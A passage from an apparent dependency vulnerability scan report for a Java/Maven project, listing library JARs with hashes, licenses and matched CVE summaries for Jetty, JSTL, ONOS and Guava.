In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), transfer-encoding chunks are handled poorly. The chunk length parsing was vulnerable to an integer overflow. Thus a large chunk size could be interpreted as a smaller chunk size and content sent as chunk body could be interpreted as a pipelined request. If Jetty was deployed behind an intermediary that imposed some authorization and that intermediary allowed arbitrarily large chunks to be passed on unchanged, then this flaw could be used to bypass the authorization imposed by the intermediary as the fake pipelined request would not be interpreted by the intermediary as a request.

Vulnerable Software & Versions:

CVE-2017-7658  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-19 Data Processing Errors

In Eclipse Jetty Server, versions 9.2.x and older, 9.3.x (all non HTTP/1.x configurations), and 9.4.x (all HTTP/1.x configurations), when presented with two content-lengths headers, Jetty ignored the second. When presented with a content-length and a chunked encoding header, the content-length was ignored (as per RFC 2616). If an intermediary decided on the shorter length, but still passed on the longer body, then body content could be interpreted by Jetty as a pipelined request. If the intermediary was imposing authorization, the fake pipelined request would bypass that authorization.

Vulnerable Software & Versions:

CVE-2017-9735  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Jetty through 9.4.x is prone to a timing channel in util/security/Password.java, which makes it easier for remote attackers to obtain access by observing elapsed times before rejection of incorrect passwords.

Vulnerable Software & Versions:

taglibs-standard-spec-1.2.1.jar

Description:

 
 An implementation of the JSP Standard Tag Library (JSTL) Specification API.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/taglibs/taglibs-standard-spec/1.2.1/taglibs-standard-spec-1.2.1.jar
MD5: 5948855e1b1a8048907ce84a6cb17de8
SHA1: 32aa0d038dd1e3a4c4e8ecc3c14733c6f54bef3b
SHA256:b30b47704352230a1af056048e9185ac84f426ded3794f8fbc85494ee69579e2
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2015-0254  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a (1) <x:parse> or (2) <x:transform> JSTL XML tag.

Vulnerable Software & Versions:

apache-jstl-9.2.15.v20160210.jar

File Path: /Users/Kevin/.m2/repository/org/eclipse/jetty/apache-jstl/9.2.15.v20160210/apache-jstl-9.2.15.v20160210.jar
MD5: 9db9288aa58d4e0a1d63a37fd400c077
SHA1: c4d2ca2cdb2894a766afd6405c2843c4444e4e56
SHA256:6723e9340ae5a91a8446cd3ddae366b0dae12e31e85f6027be41f17ab68eadaa
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.eclipse.jetty:apache-jstl:9.2.15.v20160210  Confidence:Highest
  • cpe: cpe:/a:apache_tomcat:apache_tomcat:9.2.15.v20160210  Confidence:Low  

websocket-common-9.2.15.v20160210.jar

Description:

 Administrative parent pom for Jetty modules

License:

http://www.apache.org/licenses/LICENSE-2.0, http://www.eclipse.org/org/documents/epl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/jetty/websocket/websocket-common/9.2.15.v20160210/websocket-common-9.2.15.v20160210.jar
MD5: d02f4478984ab4b3653e446172d95ac3
SHA1: ee5616ec65d6c8f05fe16ee4dbb6723b2ebff470
SHA256:5caae59182ebf39ebe6ba41c1ddf713787e0ce1d4300c1f6623e5b1f245ec453
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.eclipse.jetty.websocket:websocket-common:9.2.15.v20160210  Confidence:Highest
  • cpe: cpe:/a:jetty:jetty:9.2.15.v20160210  Confidence:Low  
  • cpe: cpe:/a:eclipse:jetty:9.2.15.v20160210  Confidence:Low  

CVE-2017-7656  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-284 Improper Access Control

In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), HTTP/0.9 is handled poorly. An HTTP/1 style request line (i.e. method space URI space version) that declares a version of HTTP/0.9 was accepted and treated as a 0.9 request. If deployed behind an intermediary that also accepted and passed through the 0.9 version (but did not act on it), then the response sent could be interpreted by the intermediary as HTTP/1 headers. This could be used to poison the cache if the server allowed the origin client to generate arbitrary content in the response.

Vulnerable Software & Versions:

CVE-2017-7657  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-190 Integer Overflow or Wraparound

In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), transfer-encoding chunks are handled poorly. The chunk length parsing was vulnerable to an integer overflow. Thus a large chunk size could be interpreted as a smaller chunk size and content sent as chunk body could be interpreted as a pipelined request. If Jetty was deployed behind an intermediary that imposed some authorization and that intermediary allowed arbitrarily large chunks to be passed on unchanged, then this flaw could be used to bypass the authorization imposed by the intermediary as the fake pipelined request would not be interpreted by the intermediary as a request.

Vulnerable Software & Versions:

CVE-2017-7658  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-19 Data Processing Errors

In Eclipse Jetty Server, versions 9.2.x and older, 9.3.x (all non HTTP/1.x configurations), and 9.4.x (all HTTP/1.x configurations), when presented with two content-lengths headers, Jetty ignored the second. When presented with a content-length and a chunked encoding header, the content-length was ignored (as per RFC 2616). If an intermediary decided on the shorter length, but still passed on the longer body, then body content could be interpreted by Jetty as a pipelined request. If the intermediary was imposing authorization, the fake pipelined request would bypass that authorization.

Vulnerable Software & Versions:

CVE-2017-9735  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Jetty through 9.4.x is prone to a timing channel in util/security/Password.java, which makes it easier for remote attackers to obtain access by observing elapsed times before rejection of incorrect passwords.

Vulnerable Software & Versions:

websocket-api-9.2.15.v20160210.jar

Description:

 Administrative parent pom for Jetty modules

License:

http://www.apache.org/licenses/LICENSE-2.0, http://www.eclipse.org/org/documents/epl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/jetty/websocket/websocket-api/9.2.15.v20160210/websocket-api-9.2.15.v20160210.jar
MD5: ed9937a137a90d8e49fa1c71b0db6346
SHA1: f0340017129a65097824dd62a04b3c887f397dd9
SHA256:2ad5ab7d46a22e9f50987dcb59da0d9ebbc353359f724c66cb06bc13fb6df1c6
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.eclipse.jetty.websocket:websocket-api:9.2.15.v20160210  Confidence:Highest

javax.websocket-api-1.1.jar

Description:

 JSR 356: Java API for WebSocket

License:

https://glassfish.java.net/public/CDDL+GPL_1_1.html
File Path: /Users/Kevin/.m2/repository/javax/websocket/javax.websocket-api/1.1/javax.websocket-api-1.1.jar
MD5: be29e11a4a15742aa6fb418fa46345e3
SHA1: eeeb68631711256418dfbb47b11c731b6c8f6235
SHA256:a260973517bf6411d659b588a719aa27e7e4e47dfbd510fceb5bf1023a2c45e4
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: javax.websocket:javax.websocket-api:1.1  Confidence:Highest

javax-websocket-server-impl-9.2.15.v20160210.jar

Description:

 javax.websocket.server Implementation

License:

http://www.apache.org/licenses/LICENSE-2.0, http://www.eclipse.org/org/documents/epl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/jetty/websocket/javax-websocket-server-impl/9.2.15.v20160210/javax-websocket-server-impl-9.2.15.v20160210.jar
MD5: 7aae20354f7e514198ef77fea3e5279f
SHA1: 241e7f1fc7fa6ba305f5a268cbe1faf7d12858fd
SHA256:b15394d96713ffd7e22d6d04a2ba1a1b06a732fafab46c117818e7eda9c442a0
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:jetty:jetty:9.2.15.v20160210  Confidence:Low  
  • cpe: cpe:/a:eclipse:jetty:9.2.15.v20160210  Confidence:Low  
  • maven: org.eclipse.jetty.websocket:javax-websocket-server-impl:9.2.15.v20160210  Confidence:Highest

CVE-2017-7656  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-284 Improper Access Control

In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), HTTP/0.9 is handled poorly. An HTTP/1 style request line (i.e. method space URI space version) that declares a version of HTTP/0.9 was accepted and treated as a 0.9 request. If deployed behind an intermediary that also accepted and passed through the 0.9 version (but did not act on it), then the response sent could be interpreted by the intermediary as HTTP/1 headers. This could be used to poison the cache if the server allowed the origin client to generate arbitrary content in the response.

Vulnerable Software & Versions:

CVE-2017-7657  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-190 Integer Overflow or Wraparound

In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), transfer-encoding chunks are handled poorly. The chunk length parsing was vulnerable to an integer overflow. Thus a large chunk size could be interpreted as a smaller chunk size and content sent as chunk body could be interpreted as a pipelined request. If Jetty was deployed behind an intermediary that imposed some authorization and that intermediary allowed arbitrarily large chunks to be passed on unchanged, then this flaw could be used to bypass the authorization imposed by the intermediary as the fake pipelined request would not be interpreted by the intermediary as a request.

Vulnerable Software & Versions:

CVE-2017-7658  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-19 Data Processing Errors

In Eclipse Jetty Server, versions 9.2.x and older, 9.3.x (all non HTTP/1.x configurations), and 9.4.x (all HTTP/1.x configurations), when presented with two content-lengths headers, Jetty ignored the second. When presented with a content-length and a chunked encoding header, the content-length was ignored (as per RFC 2616). If an intermediary decided on the shorter length, but still passed on the longer body, then body content could be interpreted by Jetty as a pipelined request. If the intermediary was imposing authorization, the fake pipelined request would bypass that authorization.

Vulnerable Software & Versions:

CVE-2017-9735  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Jetty through 9.4.x is prone to a timing channel in util/security/Password.java, which makes it easier for remote attackers to obtain access by observing elapsed times before rejection of incorrect passwords.

Vulnerable Software & Versions:

onos-core-dist-1.13.1.jar

File Path: /Users/Kevin/.m2/repository/org/onosproject/onos-core-dist/1.13.1/onos-core-dist-1.13.1.jar
MD5: 3fd21200cb9531fabcba49cabc70d4b6
SHA1: 73731679c242852f1763125c23e81bcd68796d6b
SHA256:263593273d2497a54eb722bdfb481771dfe60f941de5938c6065240d5c129889
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2018-1000614  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

ONOS Controller version 1.13.1 and earlier contains an XML External Entity (XXE) vulnerability in providers/netconf/alarm/src/main/java/org/onosproject/provider/netconf/alarm/NetconfAlarmTranslator.java. An adversary can remotely launch advanced XXE attacks on the ONOS controller without authentication. This attack appears to be exploitable via a crafted protocol message.

Vulnerable Software & Versions:

CVE-2018-1000615  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

ONOS Controller version 1.13.1 and earlier contains a Denial of Service (service crash) vulnerability in the OVSDB component of ONOS. An adversary can remotely crash the OVSDB service of the ONOS controller via a normal switch. To exploit it, the attacker must be able to control or forge a switch in the network.

Vulnerable Software & Versions:

CVE-2018-1000616  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

ONOS controller version 1.13.1 and earlier contains an XML External Entity (XXE) vulnerability in onos\drivers\utilities\src\main\java\org\onosproject\drivers\utilities\XmlConfigParser.java loadxml(). An adversary can remotely launch XXE attacks on the ONOS controller via an OpenConfig Terminal Device. This attack appears to be exploitable via network connectivity.

Vulnerable Software & Versions:

asm-5.0.4.jar

File Path: /Users/Kevin/.m2/repository/org/ow2/asm/asm/5.0.4/asm-5.0.4.jar
MD5: c8a73cdfdf802ab0220c860d590d0f84
SHA1: 0da08b8cce7bbf903602a25a3a163ae252435795
SHA256:896618ed8ae62702521a78bc7be42b7c491a08e6920a15f89a3ecdec31e9a220
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.ow2.asm:asm:5.0.4  Confidence:Highest

commons-collections-3.2.2.jar

Description:

 Types that extend and augment the Java Collections Framework.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/commons-collections/commons-collections/3.2.2/commons-collections-3.2.2.jar
MD5: f54a8510f834a1a57166970bfc982e94
SHA1: 8ad72fe39fa8c91eaaf12aadb21e0c3661fe26d5
SHA256:eeeae917917144a68a741d4c0dff66aa5c5c5fd85593ff217bced3fc8ca783b8
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:commons_collections:3.2.2  Confidence:Low  
  • maven: commons-collections:commons-collections:3.2.2  Confidence:Highest

commons-configuration-1.10.jar

Description:

 Tools to assist in the reading of configuration/preferences files in various formats.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/commons-configuration/commons-configuration/1.10/commons-configuration-1.10.jar
MD5: b16511ce540fefd53981245f5f21c5f8
SHA1: 2b36e4adfb66d966c5aef2d73deb6be716389dc9
SHA256:95d4e6711e88ce78992c82c25bc03c8df9ecf5a357f0de0bec72a26db3399374
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: commons-configuration:commons-configuration:1.10  Confidence:Highest

commons-lang3-3.6.jar

Description:

 
 Apache Commons Lang, a package of Java utility classes for the classes that are in java.lang's hierarchy, or are considered to be so standard as to justify existence in java.lang.

License:

https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/commons/commons-lang3/3.6/commons-lang3-3.6.jar
MD5: 5d18f68b5122fd398c118df53ab4cf55
SHA1: 9d28a6b23650e8a7e9063c04588ace6cf7012c17
SHA256:89c27f03fff18d0b06e7afd7ef25e209766df95b6c1269d6c3ebbdea48d5f284
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.commons:commons-lang3:3.6  Confidence:Highest

commons-logging-1.2.jar

Description:

 Apache Commons Logging is a thin adapter allowing configurable bridging to other, well known logging systems.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/commons-logging/commons-logging/1.2/commons-logging-1.2.jar
MD5: 040b4b4d8eac886f6b4a2a3bd2f31b00
SHA1: 4bfc12adfe4842bf07b657f0369c4cb522955686
SHA256:daddea1ea0be0f56978ab3006b8ac92834afeefbd9b7e4e6316fca57df0fa636
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: commons-logging:commons-logging:1.2  Confidence:Highest

commons-math3-3.6.1.jar

Description:

 The Apache Commons Math project is a library of lightweight, self-contained mathematics and statistics components addressing the most common practical problems not immediately available in the Java programming language or commons-lang.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/commons/commons-math3/3.6.1/commons-math3-3.6.1.jar
MD5: 5b730d97e4e6368069de1983937c508e
SHA1: e4ba98f1d4b3c80ec46392f25e094a6a2e58fcbf
SHA256:1e56d7b058d28b65abd256b8458e3885b674c1d588fa43cd7d1cbb9c7ef2b308
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.commons:commons-math3:3.6.1  Confidence:Highest

commons-pool-1.6.jar

Description:

 Commons Object Pooling Library

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/commons-pool/commons-pool/1.6/commons-pool-1.6.jar
MD5: 5ca02245c829422176d23fa530e919cc
SHA1: 4572d589699f09d866a226a14b7f4323c6d8f040
SHA256:46c42b4a38dc6b2db53a9ee5c92c63db103665d56694e2cfce2c95d51a6860cc
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: commons-pool:commons-pool:1.6  Confidence:Highest

concurrent-trees-2.6.1.jar

Description:

 Concurrent Radix Trees and Concurrent Suffix Trees for Java.

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/googlecode/concurrent-trees/concurrent-trees/2.6.1/concurrent-trees-2.6.1.jar
MD5: 61170474fb5c73f668d786b972c2040e
SHA1: 9b647240522ab67c003de9b6702ca81ac0c15efc
SHA256:04e3724984e2a5cbf55606cfa372a5bd3d3c5d2a21533a7004e3cde539761fa5
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.googlecode.concurrent-trees:concurrent-trees:2.6.1  Confidence:Highest

error_prone_annotations-2.0.18.jar

File Path: /Users/Kevin/.m2/repository/com/google/errorprone/error_prone_annotations/2.0.18/error_prone_annotations-2.0.18.jar
MD5: 98051758c08c9b7111b3268655069432
SHA1: 5f65affce1684999e2f4024983835efc3504012e
SHA256:cb4cfad870bf563a07199f3ebea5763f0dec440fcda0b318640b1feaa788656b
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.google.errorprone:error_prone_annotations:2.0.18  Confidence:Highest

j2objc-annotations-1.1.jar

Description:

 
 A set of annotations that provide additional information to the J2ObjC translator to modify the result of translation.

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/google/j2objc/j2objc-annotations/1.1/j2objc-annotations-1.1.jar
MD5: 49ae3204bb0bb9b2ac77062641f4a6d7
SHA1: ed28ded51a8b1c6b112568def5f4b455e6809019
SHA256:2994a7eb78f2710bd3d3bfb639b2c94e219cedac0d4d084d516e78c16dddecf6
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.google.j2objc:j2objc-annotations:1.1  Confidence:Highest

animal-sniffer-annotations-1.14.jar

File Path: /Users/Kevin/.m2/repository/org/codehaus/mojo/animal-sniffer-annotations/1.14/animal-sniffer-annotations-1.14.jar
MD5: 9d42e46845c874f1710a9f6a741f6c14
SHA1: 775b7e22fb10026eed3f86e8dc556dfafe35f2d5
SHA256:2068320bd6bad744c3673ab048f67e30bef8f518996fa380033556600669905d
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.mojo:animal-sniffer-annotations:1.14  Confidence:Highest

guava-22.0.jar

Description:

 
 Guava is a suite of core and expanded libraries that include utility classes, google's collections, io classes, and much much more. Guava has only one code dependency - javax.annotation, per the JSR-305 spec.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/google/guava/guava/22.0/guava-22.0.jar
MD5: 5ba5b28f59ed2d96534ece0a72802db6
SHA1: 3564ef3803de51fb0530a8377ec6100b33b0d073
SHA256:1158e94c7de4da480873f0b4ab4a1da14c0d23d4b1902cc94a58a6f0f9ab579e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.google.guava:guava:22.0  Confidence:Highest
  • cpe: cpe:/a:google:guava:22.0  Confidence:Highest  

CVE-2018-10237  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-502 Deserialization of Untrusted Data

Unbounded memory allocation in Google Guava 11.0 through 24.x before 24.1.1 allows remote attackers to conduct denial of service attacks against servers that depend on this library and deserialize attacker-provided data, because the AtomicDoubleArray class (when serialized with Java serialization) and the CompoundOrdering class (when serialized with GWT serialization) perform eager allocation without appropriate checks on what a client has sent and whether the data size is reasonable.

Vulnerable Software & Versions:

jackson-core-2.9.5.jar

Description:

 Core Jackson processing abstractions (aka Streaming API), implementation for JSON

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/fasterxml/jackson/core/jackson-core/2.9.5/jackson-core-2.9.5.jar
MD5: ec59f24f7f8d9acf53301c562722adf2
SHA1: a22ac51016944b06fd9ffbc9541c6e7ce5eea117
SHA256: a2bebaa325ad25455b02149c67e6052367a7d7fc1ce77de000eed284a5214eac
Referenced In Project/Scope: trial:compile

Identifiers

  • cpe: cpe:/a:fasterxml:jackson:2.9.5  Confidence: Low
  • maven: com.fasterxml.jackson.core:jackson-core:2.9.5  Confidence: Highest

javax.ws.rs-api-2.1.jar

Description:

 Java API for RESTful Web Services (JAX-RS)

License:

CDDL 1.1: https://oss.oracle.com/licenses/CDDL+GPL-1.1
GPL2 w/ CPE: https://oss.oracle.com/licenses/CDDL+GPL-1.1
File Path: /Users/Kevin/.m2/repository/javax/ws/rs/javax.ws.rs-api/2.1/javax.ws.rs-api-2.1.jar
MD5: 2f754caa430ca5a51a662d6aa821a152
SHA1: 426a0862406536e690c7caa8bb6ed32191986fac
SHA256: 1a4295889416c6972addcd425dfeeee6e6ede110e8b2dc8b49044e9b400ad5db
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: javax.ws.rs:javax.ws.rs-api:2.1  Confidence: Highest
  • cpe: cpe:/a:ws_project:ws:2.1  Confidence: Low

osgi-resource-locator-1.0.1.jar

Description:

  See http://wiki.glassfish.java.net/Wiki.jsp?page=JdkSpiOsgi for more information

License:

https://glassfish.dev.java.net/nonav/public/CDDL+GPL.html
File Path: /Users/Kevin/.m2/repository/org/glassfish/hk2/osgi-resource-locator/1.0.1/osgi-resource-locator-1.0.1.jar
MD5: 51e70ad8fc9d1e9fb19debeb55555b75
SHA1: 4ed2b2d4738aed5786cfa64cba5a332779c4c708
SHA256: 775003be577e8806f51b6e442be1033d83be2cb2207227b349be0bf16e6c0843
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.glassfish.hk2:osgi-resource-locator:1.0.1  Confidence: Highest

jersey-common-2.26.jar

Description:

 Jersey core common packages

License:

https://oss.oracle.com/licenses/CDDL+GPL-1.1
File Path: /Users/Kevin/.m2/repository/org/glassfish/jersey/core/jersey-common/2.26/jersey-common-2.26.jar
MD5: 2f5dd10b3063c4a4011ff5d55accf107
SHA1: d96475745c5e72cafcbc4dc9e2e725f4d9683f21
SHA256: bc0e95153bef81c44439d25a662168226b9adee94db27c1198f9777e382b1b17
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.glassfish.jersey.core:jersey-common:2.26  Confidence: Highest

jersey-client-2.26.jar

Description:

 Jersey core client implementation

License:

https://oss.oracle.com/licenses/CDDL+GPL-1.1
File Path: /Users/Kevin/.m2/repository/org/glassfish/jersey/core/jersey-client/2.26/jersey-client-2.26.jar
MD5: 4383747f111621f8f78ad34837169a23
SHA1: 125b8d1040d121a5dc4ce6858e21a6160bed7afa
SHA256: 3e44b7db8691eb0b2a6751eda888150b9ba1092a5805f11e4727fd4904407a41
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.glassfish.jersey.core:jersey-client:2.26  Confidence: Highest

jersey-media-jaxb-2.26.jar

Description:

JAX-RS features based upon JAX-B.

License:

https://oss.oracle.com/licenses/CDDL+GPL-1.1
File Path: /Users/Kevin/.m2/repository/org/glassfish/jersey/media/jersey-media-jaxb/2.26/jersey-media-jaxb-2.26.jar
MD5: 14426c1253795f56b48da8c9ffc42d8d
SHA1: 791397ceb5d1c8f389664b1de3e4208c2ac1015b
SHA256: b663ed76511f19c1c7312a1cca3e3c5e6e07973d9822d2539ab2a6fad57f99b4
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.glassfish.jersey.media:jersey-media-jaxb:2.26  Confidence: Highest

javax.inject-2.5.0-b42.jar

Description:

 Injection API (JSR 330) version ${javax.inject.version} repackaged as OSGi bundle

License:

https://glassfish.java.net/nonav/public/CDDL+GPL_1_1.html
File Path: /Users/Kevin/.m2/repository/org/glassfish/hk2/external/javax.inject/2.5.0-b42/javax.inject-2.5.0-b42.jar
MD5: 70c06ad58ec733717d01efe7aa06d0dc
SHA1: 98e0b7dcef77dc04809f0603868140a1c60bea71
SHA256: 3bcf096beb918c9586be829190903090a21ac40513c1401e1b986e6030addc98
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.glassfish.hk2.external:javax.inject:2.5.0-b42  Confidence: Highest

validation-api-1.1.0.Final.jar

Description:

Bean Validation API

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/javax/validation/validation-api/1.1.0.Final/validation-api-1.1.0.Final.jar
MD5: 4c257f52462860b62ab3cdab45f53082
SHA1: 8613ae82954779d518631e05daa73a6a954817d5
SHA256: f39d7ba7253e35f5ac48081ec1bc28c5df9b32ac4b7db20853e5a8e76bf7b0ed
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: javax.validation:validation-api:1.1.0.Final  Confidence: Highest

jersey-server-2.26.jar

Description:

 Jersey core server implementation

License:

https://oss.oracle.com/licenses/CDDL+GPL-1.1
File Path: /Users/Kevin/.m2/repository/org/glassfish/jersey/core/jersey-server/2.26/jersey-server-2.26.jar
MD5: 239161e246b3f54c77c461ee15d8065b
SHA1: aa8eff3d591641dadd7c9880bb73b59bf46d4c82
SHA256: d9f7a1e0d39267eb02c87046d205f2a90e38f2d2a3be885a619263f732a47935
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.glassfish.jersey.core:jersey-server:2.26  Confidence: Highest

jsr305-3.0.1.jar

Description:

 JSR305 Annotations for Findbugs

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/google/code/findbugs/jsr305/3.0.1/jsr305-3.0.1.jar
MD5: c6532beb3f7cc54a8d73d25d5602b9e4
SHA1: f7be08ec23c21485b9b5a1cf1654c2ec8c58168d
SHA256: c885ce34249682bc0236b4a7d56efcc12048e6135a5baf7a9cde8ad8cda13fcd
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: com.google.code.findbugs:jsr305:3.0.1  Confidence: Highest

kryo-4.0.1.jar

Description:

 Fast, efficient Java serialization. This is the parent pom that assembles the main kryo and shaded kryo artifacts.

License:

3-Clause BSD License: https://opensource.org/licenses/BSD-3-Clause
File Path: /Users/Kevin/.m2/repository/com/esotericsoftware/kryo/4.0.1/kryo-4.0.1.jar
MD5: 654f6326f505c18d67e04c43c6ad6bef
SHA1: 5053899c213a6ce50a800d4902c5a9de49fe0098
SHA256: 05da64250f6e6488cd79a2609887fd3b9db46c37cdc6daaba88a178632bf48f9
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: com.esotericsoftware:kryo-parent:4.0.1  Confidence: High
  • maven: com.esotericsoftware:kryo:4.0.1  Confidence: Highest

metrics-core-3.2.2.jar

Description:

Metrics is a Java library which gives you unparalleled insight into what your code does in production. Metrics provides a powerful toolkit of ways to measure the behavior of critical components in your production environment.

License:

http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /Users/Kevin/.m2/repository/io/dropwizard/metrics/metrics-core/3.2.2/metrics-core-3.2.2.jar
MD5: da529999d5083e800829eaab432a8a54
SHA1: cd9886f498ee2ab2d994f0c779e5553b2c450416
SHA256: 5c6f685e41664d10c70c65837cba9e58d39ff3896811e3b5707a934b11c85ad0
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: io.dropwizard.metrics:metrics-core:3.2.2  Confidence: Highest

metrics-json-3.2.2.jar

Description:

A set of Jackson modules which provide serializers for most Metrics classes.

License:

http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /Users/Kevin/.m2/repository/io/dropwizard/metrics/metrics-json/3.2.2/metrics-json-3.2.2.jar
MD5: ca842c88e0ef8bac7e674c145108fc0c
SHA1: 234612b9739a651eb2b71a8f9e9c4d11d7ccf849
SHA256: 38f50ac1f211518279031919bbcc0e02f6d6659d02dcd6f4e47e90b16851c821
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: io.dropwizard.metrics:metrics-json:3.2.2  Confidence: Highest

minlog-1.3.0.jar

Description:

 Minimal overhead Java logging

License:

New BSD License: http://www.opensource.org/licenses/bsd-license.php
File Path: /Users/Kevin/.m2/repository/com/esotericsoftware/minlog/1.3.0/minlog-1.3.0.jar
MD5: 5ab0ee168b90e0ad7010b159e603d304
SHA1: ff07b5f1b01d2f92bb00a337f9a94873712f0827
SHA256: f7b399d3a5478a4f3e0d98bd1c9f47766119c66414bc33aa0f6cde0066f24cc2
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: com.esotericsoftware:minlog:1.3.0  Confidence: Highest

netty-3.10.5.Final.jar

Description:

The Netty project is an effort to provide an asynchronous event-driven network application framework and tools for rapid development of maintainable high performance and high scalability protocol servers and clients. In other words, Netty is a NIO client server framework which enables quick and easy development of network applications such as protocol servers and clients. It greatly simplifies and streamlines network programming such as TCP and UDP socket server.

License:

Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0
File Path: /Users/Kevin/.m2/repository/io/netty/netty/3.10.5.Final/netty-3.10.5.Final.jar
MD5: 14466fef5f114f444c688f7977e9dbce
SHA1: 9ca7d55d246092bddd29b867706e2f6c7db701a0
SHA256: eb031acf8a00733481bcd60807925ecfc9ce3840f13823d4b96cdcb1132db1da
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: io.netty:netty:3.10.5.Final  Confidence: Highest
  • cpe: cpe:/a:netty_project:netty:3.10.5  Confidence: Low

netty-transport-4.1.8.Final.jar

Description:

Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers and clients.

License:

http://www.apache.org/licenses/LICENSE-2.0
